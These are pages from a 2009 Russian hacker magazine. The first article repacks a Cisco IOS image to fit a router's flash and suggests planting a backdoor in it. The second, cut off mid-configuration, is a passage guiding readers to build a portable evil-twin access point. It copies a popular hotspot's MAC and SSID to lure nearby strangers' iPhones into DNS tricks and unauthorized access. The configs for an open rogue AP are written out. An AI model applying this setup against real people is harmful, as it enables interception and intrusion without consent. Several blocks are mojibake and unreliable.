который может потребоваться в IOS 12.4, но 

которого нет в 12.3? За подсказкой вновь 

отправляю к Cisco IOS Feature Navigator (tools. 

cisco.com/ITDIT/CFN/Dispatch). Утилита 

сравнения образов тебе в помощь, но ответ, 

скорее всего, — «нет». Отсюда вывод — не 

стоит меня корить в малой практичности, так 

как изначально статья в большей степени 

исследовательская (just for fun). 

У меня не возникло бы потребности писать 

статью, если бы не две небольших проблемы. О 

первой я уже упомянул — это объем DRAM памяти. 

К сожалению, я не повелитель паяльника 

и вольтметра, так что здесь поделать ничего не 

могу. Стоит только надеяться, что ОС не уйдет 

в core в самый ответственный момент из-за 

недостатка памяти. Вторая проблема, которая 

застигла меня врасплох — это размер самого 

образа IOS 12.4 и тот факт, что он не помещается 

на флеш объемом 16 МB. И неудивительно: 

файл образа — c2600-entbasek9-mz.124-9. 

T1.bin — который я взял для эксперимента, 

занимает 16,4 MB, то есть 17 257 364 байт. 

Даже если стереть флеш с опцией no-squeezereserve-space 

(командой erase /no-squeezereserve-space 

flash:), это нам не поможет. 

Хотя, в свое время, для образа c2600-ik9o3s3- 

mz.123-13.bin было решением проблемы (этот 

образ чуть меньше размера самой флеш, и для 

его загрузки требуется отформатировать ее с 

опцией, запрещающей резервировать свободное 

место). 

ЧТО ДЕЛАТЬ? БЕЖАТЬ! 

Решения здесь может быть два — либо грузиться 

с tftp, что не всегда удобно, либо же взломать 

образ так, чтобы размер стал меньше. Грубо 

говоря, перепаковать его (собственно, это и 

было отчасти сделано). 

Посылом номер три стал эмулятор Dynamips. 

Причем он тут? Именно он натолкнул меня на 

058 

XÀÊÅÐ 04 /124/ 09

взлом 

Advanced Enterprise Services 

Advanced IP + Enterprise + Cisco IOS Firewall 

Advanced IP Services 

IS-IS, MPLS, L2/L3 VPNs, IPv6***, 

Mobile Support, IP SLAs, etc. 

Enterprice Services 

IPv6***, IS-IS, IP SLAs, IBM Services, 

L3 Routed Protocols, etc. 

IP Services 

EIGRP, OSPF, BGP, GLBP, QoS, High Availability, NAT, nBAR, 

VRF-lite, Multicast, Virtual Switching System, etc. 

>>Типы IOS 

и их функционал 

** EIGRP-STUB in IP Base will be available on the Cisco Catalyst 4500 Series (Sup4) 

and the Cisco Catalyst 6500 Series. 

*** Starting with 12.2(33)SXI on the 6500 series, Cisco is offering packaging 

parity for IPv6 feature support for a technology will be packeged in the same 

feature set as IPv4. This parity will be expended to other platforms in the future. 

IP Base 

RIP, HSRP/VRRP, StackWise, GRE, EIGRP STUB**, WCCP, etc. 

LAN Base 

ACL, QoS, Enhanced 802.1x, AutoQoS, AutoSecure, etc. 

r - The image runs from ROM 

l - The image is relocatable 

z - The image is zip compressed 

x -The image is mzip compressed 

Layer 2 Base 

Basic Ethernet L2. 802, tx. 802. ts. 802.w. 

Ether Chanel, 802. 1d, Port Security. SmartPorts, SSH, etc. 

В нашем случае образ имеет тип mz — работает в памяти и запакован как 

раз в zip-архив. Убедиться в этом просто — большинство архиваторов 

(WinZIP, WinRAR, 7zip) с легкостью открывают его и распаковывают. 

мысль о перепаковке образа. Если взглянуть на раздел «How to use?» на 

официальном сайте проекта (www.ipflow.utc.fr/index.php/Cisco_7200_ 

Simulator), то можно обнаружить, что эмулятор использует распакованные 

образы для ускорения загрузки: 

… 

 

To boot quickly, the preferred method is to decompress 

the IOS image with the «unzip» utility. It avoids to run 

the self-decompressing process in the emulator. 

chris@portchris2:~/dynamips-0.2.5$ unzip -p c7200- 

advipservicesk9-mz.124-9.T.bin > image.bin 

warning [c7200-advipservicesk9-mz.124-9.T.bin]: 27904 

extra bytes at beginning or within zipfile 

(attempting to process anyway) 

chris@portchris2:~/dynamips-0.2.5$ file image.bin 

image.bin: ELF 32-bit MSB executable, cisco 7200, 

version 1 (SYSV), statically linked, stripped 

You can ignore the warning, unzip has just skipped the 

self-decompressing code at the beginning of the image. 

Now, you can boot the imagå 

 

… 

УПАКОВКА 

Не мудрствуя лукаво, пытаемся перепаковать архив заново с максимально 

возможной степенью сжатия. Сразу же отмечаем, что используемый 

метод — deflate и изменить его не получится. Я использовал четыре 

архиватора, чтобы сравнить их и получил такой результат: 

7-zip 4.65 ñî ñëåäóþùèìè ïàðàìåòðàìè: 

Ôîðìàò àðõèâà — zip 

Óðîâåíü ñæàòèÿ — Óëüòðà 

Ìåòîä ñæàòèÿ — Deflate 

Ðàçìåð ñëîâàðÿ — 32ÊB 

Ðàçìåð ñëîâà — 258 

В результате был получен архив: 15,7 MB (16 489 764 bytes). WinZIP 

11.2 при использовании улучшенного метода Deflate выдал файл 

размером 16,0 MB (16 803 634 bytes). WinRAR 3.80, формат архива — 

zip с наилучшими параметрами сжатия: 16,3 MB (17131 353 bytes). 

PKZIP 9.00 от создателей формата совсем подвел, и по методу Deflate 

с максимальным сжатием произвел файл размером 16,3 MB (17 094 

474 bytes). 

Итогом моего небольшого сравнительного тестирования стал выбор для 

экспериментов архива, как нетрудно догадаться, созданного 7zip. 

Сигнатура ELF в HEX-редакторе 

Если есть запакованный образ, то можно попытаться использовать 

более оптимальные параметры сжатия, которые позволят поместить 

образ на флеш. Обращаю внимание на важную деталь — так как мы 

не собираемся переписывать самораспаковывающийся код, то есть 

заниматься дизассемблированием (да и ассемблер под 32-битные 

процессоры PowerPC я не знаю), то сам алгоритм сжатия менять мы не 

сможем. Самораспаковывающаяся часть просто не сможет распаковать 

архивы, сжатые другими методами. По поводу используемого в образе 

алгоритма сжатия — можно взглянуть вот сюда: Cisco IOS Configuration 

Fundamentals Configuration Guide, Release 12.4 — Loading and Managing 

System Images, пункт Image Naming Conventions. Поле «тип» в имени 

образа как раз отвечает за его характеристики: 

f - The image runs from flash memory 

m - The image runs from RAM 

XÀÊÅÐ 04 /124/ 09 

059

взлом 

Контрольная сумма 

Сообщение о нехватке памяти 

ТЕОРИЯ (ИНТЕГРАЦИИ НОВОГО АРХИВА) 

Далее требуется сей архив поместить вместо оригинального образа. 

Чтобы проделать это, нам понадобится шестнадцатеричный редактор 

типа WinHex, HT Editor или hview. Я предпочитаю WinHex, но понадобится 

еще и HT, чуть позже объясню почему. 

Как ты можешь видеть на скриншоте, бинарный образ IOS, скорее всего, 

есть не что иное, как исполняемый файл в формате ELF (Executable 

and Linkable Formate). ELF-формат является основным исполняемым 

файлом в *nix-like системах, поэтому неудивительно встретить его здесь. 

По ELF-формату существует четкая спецификация, последняя версия 

которой 1.2, однако для наших целей будет достаточно, например, заголовочного 

файла из состава libc — elf.h. Обычный бинарный ELF-файл 

представляет собой структуру вида: 

ELF Header 

Program Header Table (optional) 

Section 1 

Section 2 

… 

Section n 

Section Header Table 

Elf32_Half 

Elf32_Half 

Elf32_Half 

Elf32_Half 

Elf32_Half 

} Elf32_Ehdr; 

e_phentsize; 

e_phnum; 

e_shentsize; 

e_shnum; 

e_shstrndx; 

В нашем случае поле e_machine имеет значение 0x002b или 43, что 

соответствует процессору SPARC v9: 

#define EM_SPARCV9 43 /* SPARC v9 64-bit */ 

Но нам известно, что маршрутизатор 2611 использует процессор 

Motorolla MPC860, значит, поле должно иметь значение 0x0014, — что 

соответствует: 

#define EM_PPC 20 /* PowerPC */ 

Скорее всего, это простейшая защита от дизассемблирования образа. 

Нам это не сильно помешает. С помощью F6 открываем режим просмотра 

elf/header. Из него становятся известны следующие подробности: 

- elf header size 0x34 

- program header entry size 0x20 

- program header count 1 

- section header entry size 0x28 

- section header count 6 

Не углубляясь в описание (и дабы не повторяться), отправляю тебя к 

спецификации. 

Так как весь процесс исследования я проводил в MS Windows, то пришлось 

искать замену утилите readelf из состава binutils. Подходящим 

вариантом оказался шестнадцатеричный редактор HT (hte.sf.net), который 

умеет читать и модифицировать структуры данных исполняемых 

файлов ELF. При попытке открыть подопытный образ c2600-entbasek9- 

mz.124-9.T1.bin, HT сразу меня обругал, что и привлекло мое внимание. 

Обратимся к elf.h. Структура данных, отвечающая за ELF-заголовок, 

выглядит так: 

typedef struct { 

Elf_Char e_ident[EI_NIDENT]; 

Elf32_Half e_type; 

Elf32_Half e_machine; 

Elf32_Word e_version; 

Elf32_Addr e_entry; 

Elf32_Off e_phoff; 

Elf32_Off e_shoff; 

Elf32_Word e_flags; 

Elf32_Half e_ehsize; 

060 

Что, в сумме, дает размер 52+32+6*40=324 или 0x144, то есть, в файле 

всего 6 секций (соответственно, 6 заголовков секций) и 1 заголовок программы. 

Вероятнее всего, одна из секций предназначена для хранения 

архива с исполняемым образом IOS. Эту секцию можно вычислить либо 

по размеру (логично, что ее размер должен быть максимальным), либо 

по типу секции. Заголовок таблицы секций можно просмотреть, нажав 

и выбрав elf/section headers, но для начала обратимся к описанию 

секции: 

typedef struct { 

Elf32_Word sh_name; 

Elf32_Word sh_type; 

Elf32_Word sh_flags; 

Elf32_Addr sh_addr; 

Elf32_Off sh_offset; 

Elf32_Word sh_size; 

Elf32_Word sh_link; 

Elf32_Word sh_info; 

Elf32_Word sh_addralign; 

Elf32_Word sh_entsize; 

} Elf32_Shdr; 

XÀÊÅÐ 04 /124/ 09

взлом 

Редактор HT 

Стираем flash 

Поле sh_type и будет отвечать за искомый тип. 

К сожалению, здесь меня ждал облом, — большинство секций имело 

тип SHT_PROGBITS, предназначенный для секций, значение которых 

определяется самой программой. Однако четвертая секция имела тип, 

отличный от предыдущих, и значение 0x00000007 (секция предназначена 

для каких-то программных заметок). Первая (нулевая) секция 

также имеет отличный от предыдущих тип (SHT_NULL). Исходя из 

этого, ясно, что она пустая и ни с чем не ассоциирована. В итоге, приходится 

искать секцию с максимальным размером (поле sh_size). Это 

— секция за номером пять, ее размер 0x1070e7c или 17239676 байт. 

Вернемся к hex-виду ( — hex) и перейдем по смещению (поле 

sh_offset) с помощью . 

Что же мы здесь видим? Где наш архив, который должен начинаться с 

сигнатуры PK, а точнее, если следовать спецификации PKZIP-формата 

(pkware.com/documents/casestudies/APPNOTE.TXT), — с 0x04034b50 

в обратном порядке? Как ни странно, эта сигнатура обнаруживается 

на 22 байта позже. А если хорошо присмотреться, то отказывается, что 

сразу за значением 0xFEEDFACE идет размер распакованного образа 

0x02AED904. Внимательно поискав в Сети, можно наткнуться на информацию 

из книги Cisco Networks Hacking Exposed издательства McGraw 

Hill/Osborne. 

Наши русские парни Andrew A. Vladimirov, Konstantin V. Gavrilenko, 

Janis N. Vizulis and Andrei A. Mikhailovsky еще в 2006 году занимались 

разработкой бинарного патчинга IOS 12.3(6). Им удалось 

выяснить, что после магического значения 0xFEEDFACE идут 

последовательно uncompressed image size, compressed image 

size, compressed image checksum, uncompressed image checksum. 

Товарищам также стало известно, что алгоритм вычисления контрольной 

суммы представляет собой модифицированный алгоритм 

контрольной суммы в интернете. К счастью, нам не придется ничего 

вычислять — проверено на практике, что маршрутизатор сам скажет, 

какое значение должно иметь это поле, если, конечно, подсчитанная 

контрольная сумма и записанная в соответствующем поле не 

совпадут: 

Error : compressed image checksum is incorrect 

0xB99D8823 

Expected a checksum of 0xF6F69877 

Сигнатура FEEDFACE по искомому смещению 

секции (№5), содержащей архив с образом IOS, загружаемым в память, — 

0x1070e7c или 17239676 (включая 20 байт с 0xFEEDFACE по 0x504B0304). 

Размер новой секции, содержащей архив, — 0xFB9D38 или 16489784 

(включая те же 20 байт). Разница между старым и новым значением 

составит 0xB7158 — 749912. То есть, смещение четвертой секции, физически 

расположенной в файле после пятой секции, требуется изменить с 

0x1075360 на 0xFBE208! 

Старые значения после магической записи 0xFEEDFACE: 

unpacked image size: 0x02AED904 45013252 

packed image size: 0x01070E66 17239654 (ðàçíèöà ñ ðàçìåðîì 

5é ñåêöèè - íà 22 áàéòà ìåíüøå) 

packed image checksum: 0xB58BE139 

unpacked image checksum: 0xA29D4F6E 

çàòåì èäåò ñèãíàòóðà: 0x504B0304 

Новые значения после магической записи 0xFEEDFACE: 

unpacked image size: 0x02AED904 (îñòàëñÿ òîò æå) 

packed image size: 0x00FB9D22 16489762 (ðàçíèöà ñ ðàçìåðîì 

5é ñåêöèè - íà 22 áàéòà ìåíüøå) 

packed image checksum: íàì íåèçâåñòíà è ìîæíî çàìåíèòü íà 

÷òî-íèáóäü ïðèìåòíîå, òèïà 0x48000000 

unpacked image checksum: 0xA29D4F6E (îñòàëñÿ òîò æå) 

*** System received a Software forced crash *** 

signal= 0x17, code= 0x5, context= 0x800805f0 

PC = 0x0, Vector = 0x0, SP = 0x0 

ПРАКТИКА (ИНТЕГРАЦИИ НОВОГО АРХИВА) 

Перейдем к активным действиям. Для начала вырезаем из файла старую 

четвертую секцию, содержащую zip-архив, — за исключением 20 байт, 

начиная с магического значения 0xFEEDFACE до сигнатуры zip (то есть, 

со смещения 0x44F8 по смещение 0x1075360 + 0x44F8). Затем по смещению 

0x44F8 вставляем новый архив. 

Соединим всю известную нам информацию воедино. Размер старой 

XÀÊÅÐ 04 /124/ 09 

Новую контрольную сумму, как я уже говорил, сообщит сам маршрутизатор. 

После всех манипуляций конечный образ был получен, но его размер 

меня не впечатлил. По сравнению с изначальным размером 16,4 

MB (17257364 bytes) я получил всего лишь 15,7 MB (16507472 bytes). 

Разница, которую я уже посчитал выше, составила 749912 байт. 

Конечно, это позволит загрузить образ на flash, но, скорее всего, 

придется применять опцию /no-squeeze-reserve-space. Когда при 

копировании маршрутизатор запросит повторное стирание flash, 

подтверждать действие не нужно. Естественно, такая ситуация была 

бы только в том случае, если образ был бы сформирован правильно. Поэ- 

061

взлом 

Содержимое архива 

тому я не стал спешить и для загрузки образа зашел в режим rommon по 

. И — со своего компьютера загрузил образ по tftp напрямую 

в RAM: 

rommon 1>tftpdnld -r 

После загрузки маршрутизатор я сказал: 

TFTP flash copy: Error, image size (16507470) mismatches 

netsize (16507472). 

Оказалось, что при редактировании размера 5й секции я ошибся на 2 

байта (те самые 20 байт с 0xFEEDFACE + 2). 

После второй попытки загрузки выяснилось, что контрольная сумма 

запакованного образа — 0xB0257B0D: 

Head Total(b) Used(b) Free(b) Lowest(b) Largest(b) 

Processor 82A44240 20244772 8718640 11526132 10171028 

10098348 

I/O 3CA3400 3525632 1650536 1875096 1875096 1875068 

 

router#show flash: 

System flash directory: 

File Length Name/status 

1 15947076 c2600-advsecurityk9-mz.124-21-shad-pk.bin 

[15947140 bytes used, 830072 available, 16777212 total] 

16384K bytes of processor board System flash (Read/ 

Write) 

Error : compressed image checksum is incorrect 

0xB99D8823 

Expected a checksum of 0x48000000 

*** System received a Software forced crash *** 

signal= 0x17, code= 0x5, context= 0x800805f0 

PC = 0x0, Vector = 0x0, SP = 0x0 

Корректируем соответствующее поле после 0xFEEDFACE (загружаем 

файл в HT по , переходим по смещению с помощью и редактируем 

по , не забывая сохраняться по ). Снова грузимся. 

Остается еще одна небольшая проблема. Если запустить проверку: 

router#verify flash:c2600-advsecurityk9-mz.124-21- 

shad-pk.bin 

— маршрутизатор обругает нас, сообщив, что Embedded hash и 

Calculated hash не совпадают. Исправить это очень просто — 16 байт 

контрольной суммы находится в самом конце бинарного файла образа. 

Обнаружить это можно даже с помощью простого поиска: 

После исправления маршрутизатор сообщает, что контрольная сумма 

успешно подсчитана и совпадает: 

rommon 4>reset -s 

Дальше все нормально, однако затем IOS вываливается и отказывается 

работать по причине недостатка памяти. 

НИКОГДА НЕ СДАВАЙСЯ 

Я не расстроился и решил взяться за другой образ — c2600- 

advsecurityk9-mz.124-21.bin. После аналогичных манипуляций с байтами, 

даже при использовании 128-битного слова в 7zip, размер составил 

15947076 (против изначальных 16635336), что позволило загрузить его во 

flash. Помимо прочего, этот образ уже не ругался на недостаток памяти 

RAM и прекрасно чувствовал себя на этой платформе: 

router#show version 

Cisco IOS Software, C2600 Software (C2600- 

ADVSECURITYK9-M), Version 12.4(21), RELEASE SOFTWARE 

(fc1) 

 

router#show memory summary 

062 

Embedded Hash MD5 : 3DD2C6591FF4F033425147DE4540F9CD 

Computed Hash MD5 : 3DD2C6591FF4F033425147DE4540F9CD 

CCO Hash MD5 : 79020945BDFE2A354E012C8303136360 

Embedded hash verification successful. 

File system hash verification successful. 

ЛОГИЧЕСКОЕ ЗАКЛЮЧЕНИЕ 

Новый образ готов и правильно сформирован. Усвоив эту статью, ты 

получишь опыт: 

1) по формату PKZIP; 

2) по формату исполняемых файлов ELF; 

3) по внутреннему устройству образов Cisco IOS; 

4) по работе в режиме rommon маршрутизатора. 

Кроме того, готов задел для дальнейших извращений над маршрутизаторами. 

Для общего развития можно поковырять распакованные образы в 

IDA, изучить вирусы в *nix-like системах, чтобы проинфицировать образ 

своим бекдором, ну и собственно, написать бекдор. A мои изыскания здесь 

успешно заканчиваются. Все вопросы, пожелания и, в особенности, идеи, 

мой дорогой друг, я готов получить по электронной почте. С радостью отвечу 

и помогу по мере сил. Удачи в бинарном патчинге... и не только. z 

XÀÊÅÐ 04 /124/ 09

ПОДПИСКА В РЕДАКЦИИ 

ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

2100 руб. 

(на 15% дешевле чем 

при покупке в розницу) 

Единая цена по всей России. Доставка за счет издателя, 

в том числе курьером по Москве в пределах МКАД 

ВНИМАНИЕ! 

ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 

При подписке на комплект журналов 

ЖЕЛЕЗО + ХАКЕР + DVD: 

- Один номер всего за 155 рублей (на 25% дешевле, чем в розницу) 

ÇÀ 12 ÌÅÑЯÖÅÂ 

3720 

ðóá 

Подписка на журнал «ХАКЕР+DVD» на 6 месяцев 

стоит 1200 руб. 

+ 

ÇÀ 6 ÌÅÑЯÖÅÂ 

2100 

ðóá 

ВЫГОДА ГАРАНТИЯ СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ 

1. Разборчиво заполните подписной купон и квитанцию, вырезав 

их из журнала, сделав ксерокопию или распечатав с сайта www. 

glc.ru. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 

квитанции — любым из нижеперечисленных способов: 

по электронной почте subscribe@glc.ru; 

по факсу 8 (495) 780-88-24; 

по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется в день обработки купона и квитанции в редакции: 

в течение пяти рабочих дней после отправки подписных документов в 

редакцию по факсу или электронной почте; 

в течение 20 рабочих дней после отправки подписных документов по 

почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в последнем 

случае предварительно отсканировав или сфотографировав документы. 

Подписка оформляется с номера, выходящего через один календарный 

месяц после оплаты. Например, если вы производите оплату в 

апреле, то журнал будете получать с июня. 

По всем вопросам, связанным с подпиской, звоните по бесплатным телефонам 8(495)780-88-29 (для москвичей) 

и 8(800)200-3-999 (для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). Вопросы 

о подписке можно также направлять по адресу info@glc.ru или прояснить на сайте www.GLC.ru

взлом 

D0ZNP 

/ HTTP://OXOD.RU / 

iPhone 

ТЕРМИНАТОР 

СОЗДАЕМ АВТОМАТИЧЕСКОЕ СРЕДСТВО АУДИТА APPLE IPHONE 

Â ìàðòîâñêîì íîìåðå, â ñòàòüå «ßáëî÷íîå ïþðå», ÿ ðàññêàçàë î ñàìîì ïîïóëÿðíîì 

è ïðèòÿçàòåëüíîì òåëåôîíå íà ðûíêå — Apple iPhone. Ìîæíî äîëãî 

ñïîðèòü íà òåìó åãî ôóíêöèîíàëüíîñòè, ñðàâíèâàòü ñ êàìíåì èëè 

ñ ËÑÄ, âîñõèùàòüñÿ è ãëóìèòüñÿ, íî âñå ýòî ÿ îñòàâëþ íà òâîå ëè÷íîå óñìîòðåíèå. 

Íà ñåáÿ æå âîçüìó îáÿçàòåëüñòâî ïðîäîëæèòü ðàññêàç î áåçîïàñíîñòè 

óñòðîéñòâà. À áåçîïàñíîñòü iPhone, ñêàæó ÿ òåáå, îñòàâëÿåò æåëàòü ëó÷øåãî. 

>> взлом 

Сперва разберемся, что же заставляет андеграунд двигаться в 

определенном направлении исследований. Если судить по количеству 

прикладных эксплоитов (офигеть какой показатель, сам знаю), то 

Win-системы гораздо более уязвимы, чем все Nix вместе взятые. Глупо 

предполагать, что дело только в кривизне кода от Microsoft. Весь секрет 

в популярности: чем больше пользователей пользуются софтом, тем 

больше интереса (материального и идейного) искать в нем ошибки и 

уязвимости. Какой резон в публикации невероятно сложной и красивой 

атаки на какой-нибудь Amoi MD-1 (это мобильный телефон, если что)? А 

вот в простой атаке на Apple iPhone пользы куда больше! Популярности 

одной модели айфона могут позавидовать целые серии телефонов. 

Сколько всего на территории нашей прекрасной страны iPhone, не 

знает никто, но оценку этой величины дать можно. На ленте за 26 января 

значилась цифра 120.000 проданных белых 3g. До этого времени, по 

оценкам экспертов, было еще 250.000 серых телефонов. В сумме получаем 

где-то 370.000. За цифру я не ручаюсь, и, если окажется, что она в 

два раза выше, — не удивлюсь. Наши операторы обязались за два года 

продать около 3 млн. устройств, так что им еще есть куда стремиться... 

В одном отдельно взятом кафе в столице легко можно встретить 5-10 

айфонов за раз. Хотел бы ты получить возможность обрабатывать чужие 

064 

XÀÊÅÐ 04 /124/ 09

взлом 

Power in from car 

Power out to PC 

GND 

C11 

100nF 

O2 

BC 547 

R7 

10k 

GND 

C9 

1nf 

R6 

1k 

R2 

GND 

C10 

22nF 

220k 

PAD1 

PAD2 

GND 

С8 

100nF 

GND 

1 

L1 

120H 

1 

2 

3 

4 

10k 

R9 

2 

С1 

1000uF 

С2 

COMREF 

VFB VCC 

ILIM OUT 

OSCGND 

8 

7 

6 

5 

1000uF 

GND GND 

O2 

C6 

GND 

D1 

22 

100nF 

GND 

PS2 

O3 

PS1 13:13 

PS4 PS3 

on Temte 

1000uF 

C7 

US 3 

IRFZ44N 

GND 

GND 

D1 

С3 

R5 R4 

10k 47k 

GND 

R3 

1000uF 

С4 

2k2 

O1 

BC 547 

GND 

L2 

1 2 

120H 

ЭЛЕКТРИЧЕСКАЯ СХЕМА АДАПТЕРА ПИТАНИЯ 12 В 

ОТ АВТОМОБИЛЬНОГО ПРИКУРИВАТЕЛЯ С ПОДАВЛЕНИЕМ 

ШУМОВ 

1000uF 

GND GND 

С5 

GND 

1000uF 

GND 

PAD3 

PAD4 

телефоны в автоматическом режиме? Дальше я опишу процесс создания 

устройства для поиска и аудита яблочных телефонов. Мы скомбинируем 

принципы пассивного и активного сканирования, а также описанные в 

предыдущей статье атаки. Наш терминатор будет пытаться получить доступ 

ко всем айфонам в округе и запускать на них тестовое приложение 

для отправки SMS. Ну все, хватит обещаний, поехали! 

ВЫБИРАЕМ ПЛАТФОРМУ 

Давай прикинем, каким основным требованиям должно удовлетворять 

автоматическое средство аудита мобильных телефонов? Прежде всего, 

конечно, мобильность, извиняюсь за тавтологию. Идея использовать 

обычный ноутбук приходит в голову сразу, однако, это не всегда удобно. 

Я предлагаю поступить по-хакерски и сделать iPhone терминатора из 

обычного беспроводного роутера или точки доступа. Такая платформа 

обладает рядом преимуществ по сравнению с ноутом: 

• Êîìïàêòíûå ðàçìåðû (ìåíüøå, ÷åì äàæå 10-äþéìîâûå íåò áóêè) 

• Ìàëåíüêèé âåñ (150 ã!) 

• Íèçêîå ýíåðãîïîòðåáëåíèå (ïèòàåòñÿ îò àêêóìóëÿòîðà) 

• Øòàòíûé ðàçúåì äëÿ âíåøíåé àíòåííû (ïîïðîáóé íàéäè â 

ìàãàçèíå PCMCIA áåñïðîâîäíóþ êàðòó ñ ðàçúåìîì âíåøíåé 

àíòåííû) 

• Äåøåâèçíà (~2000ð ïðîòèâ ~8000 ðóá. çà ñàìûé äåøåâûé 

íåòáóê) 

Кроме того, в определенных местах человек с ноутом привлекает 

гораздо больше внимания, чем человек с рюкзачком или сумкой. Вместо 

штатного монитора контролировать устройство мы будем через SSH с 

телефона — таким образом, шансы прохожих разглядеть что-то интересное 

на твоем экране уменьшаются до нуля. Если тебя коробит вопрос 

производительности, то смею заверить — процессора ARM 

200 МГц хватить для наших нужд выше крыши. Нелишним будет USBпорт 

— мы поместим туда флешку для ведения ядовитых логов, но если 

его нет, можно скидывать все на «админский» телефон или сервер в 

интернете. Я буду описывать процесс на примере Asus WL-500G, просто 

потому, что он валяется под рукой. Все будет абсолютно аналогично при 

XÀÊÅÐ 04 /124/ 09 

использовании любого роутера из этого списка: http://wiki.openwrt.org/ 

CompleteTableOfHardware. 

Если моих доводов в пользу выбора платформы недостаточно и желание 

повторить все нижеописанное на ноуте непреодолимо, — вперед! Весь 

используемый софт работает под линухом и без труда заведется под твой 

любимый дистрибутив или другой никс. На всякий случай напомню: 

если возникнут какие-то вопросы, можешь задать их в моем блоге (oxod. 

ru). Только не забудь вытащить жесткий диск и поставить ОС на флешку: 

при ходьбе и, тем более, беге, есть большой шанс заклинить даже самые 

дорогие диски. С платформой определились, едем дальше! 

СОБЕРИ САМ. СОЗДАЕМ СВОЮ ПРОШИВКУ 

Для моего роутера существует несколько дистрибутивов линукса. Это 

— openwrt, dd-wrt и другие, менее известные. Я решил использовать 

openwrt исключительно по этическим соображениям, и ты можешь 

выбрать что угодно, или даже воспользоваться оригинальным дистрибутивом 

от производителя, их часто выкладывают под лицензией GPL. 

В общем, необходимое условие одно — наличие toolchain, т.е. средств 

кросс-компиляции, с помощью которых мы соберем и поместим в 

прошивку нестандартные утилиты. Нам всего-то потребуются: expect, 

ssh client, sshd, http-сервер, dns-сервер. Буду рассказывать на примере 

openwrt, так что выкачиваем сборку под свою модель, в моем случае это: 

http://downloads.openwrt.org/kamikaze/8.09/brcm-2.4/openwrt-brcm- 

2.4-squashfs.trx. Вышла она 15 февраля 2009 года, — самый свежак. 

Перед прошивкой переводим устройство в Failure Mode. Для этого 

отключаем питание, зажимаем кнопку Reset и подключаем питание. 

Держим Reset, пока индикатор питания не подмигнет нам, затем отпускаем 

кнопку. Процедура входа в Failure Mode для разных роутеров может 

отличаться, но подробная процедура установки всегда будет описана 

в WIKI openwrt для каждой модели. Ссылка на инструкцию находится 

в последней колонке таблицы поддерживаемых устройств. Далее 

подключаем патч-корд к устройству и проверяем, что у нас вышло: ping 

192.168.1.1. Если все хорошо и устройство отвечает, переходим к заливке 

прошивки. Потребуется tftp-клиент, его можно взять здесь: 

• http://www.tftp-server.com/tftp-download.html — для Windows; 

• http://packages.debian.org/lenny/tftp — Debian stable. 

065

взлом 

Asus WL-500G Deluxe собственной персоной 

Автомобильный адаптер-инвертор 12 В -220 В. Способен 

тянуть компьютер 300 В 

links 

• openwrt.org — 

дистрибутив ОС 

linux для точек 

доступа. 

• dd-wrt.com — другой 

вариант дистрибутива 

ОС linux для 

точек доступа. 

• code.google. 

com/p/winchain — 

средства разработки 

для iPhone под 

Windows. 

• oxod.ru — мой 

блог. Пишу по мере 

желания. Жду комментариев, 

отвечу 

на вопросы. 

warning 

Внимание! Информация 

представлена 

исключительно 

с целью ознакомления! 

Ни автор, 

ни редакция за твои 

действия ответственности 

не несут! 

066 

После установки заливаем прошивку на устройство: 

tftp 192.168.1.1 

tftp> binary 

tftp> trace 

tftp> put openwrt-brcm-2.4-squashfs.trx 

Ждем, пока индикатор питания перестанет моргать 

(завершится процесс записи в ROM). Вот так, просто и без 

приключений, мы подготовили платформу для дальнейших 

изысканий. Теперь перейдем непосредственно к настройке. 

Выполняем команды: 

#~telnet 192.168.1.1 

#~passwd //óñòàíàâëèâàåì ïàðîëü 

#~exit //îòêëþ÷àåìñÿ 

#~ssh root@192.168.1.1 //ïåðâûé ðàç ýòà ïðîöåäóðà 

çàéìåò îêîëî ìèíóòû èëè äâóõ — íåòîðîïëèâîå 

óñòðîéñòâî ñîçäàåò êëþ÷åâûå ïàðû. Åñëè 

âðåìÿ îæèäàíèÿ SSH-êëèåíòà èñòå÷åò — ïîâòîðè 

ïîïûòêó ïîäêëþ÷åíèÿ ÷åðåç ïàðó ìèíóò 

#~ipkg update //îáíîâëÿåì áàçó ïàêåòîâ 

Возможно, перед последней командой придется еще настроить 

подключение к интернету. Настройка интерфейсов 

происходит через /etc/config/network. Если надо настроить 

PPPoE, создай в конфиге такое правило: 

config interface wan 

option ifname 

option proto 

option username 

option password 

nas0 

pppoe 

"username" 

"password" 

На этом базовая установка ОС закончена. Дистрибутив уже 

включает в себя DHCP-сервер, SSH-сервер и SSH-клиент. 

Дальнейшая настройка зависит от типа атаки. 

ДЕЛАЙ РАЗ. ВКУСНАЯ ТОЧКА ДОСТУПА 

Теперь основная задача — заставить пользователя 

iPhone подключиться к нашей точке доступа. Мы должны 

сделать ее наиболее привлекательной, сулящей 

неслыханную халяву и т.д. Первое, что приходит на ум 

— поставить SSID, который точно привлечет внимание 

любого пользователя. Например, взять существующие 

имена бесплатных WiFi-сетей. Для правдоподобности 

можно работать в режиме моста с настоящей точкой 

доступа, подключенной к интернету. Тогда пользователь 

будет иметь полноценный выход в глобальную Сеть, 

параллельно с этим попадаясь на все наши дальнейшие 

уловки с DNS (я же не зря перечислил его в требованиях!). 

Для максимального эффекта предварительно 

просканируй все сети, действующие в том районе, где 

будешь производить испытания, и выдели наиболее 

популярные точки доступа. Затем поставь своему устройству 

MAC и SSID, как у самого популярного хот-спота. 

Если ты окажешься ближе к пользователю, уровень 

сигнала от тебя будет выше, и ты получишь клиентов, 

привычно подключающихся к знакомой сети. Простейший 

конфиг беспроводного интерфейса /etc/config/ 

wireless выглядит так: 

config wifi-device wl0 

option type broadcom 

option channel 5 

option disabled 0 

config wifi-iface 

option device wl0 

option network lan 

option mode ap 

option ssid Free_Internet 

option hidden 0 

option encryption none 

Последний штрих — настройка DHCP-сервера. Мы же 

должны создать для клиентов максимально комфортные 

условия работы в нашей сети :). 

config dhcp 

option interface lan 

option start 2 //ïåðâûé âûäàííûé 

IP-àäðåñ, â íàøåì ñëó÷àå áóäåò 10.0.0.2 

option limit 100 //ñêîëüêî âñåãî 

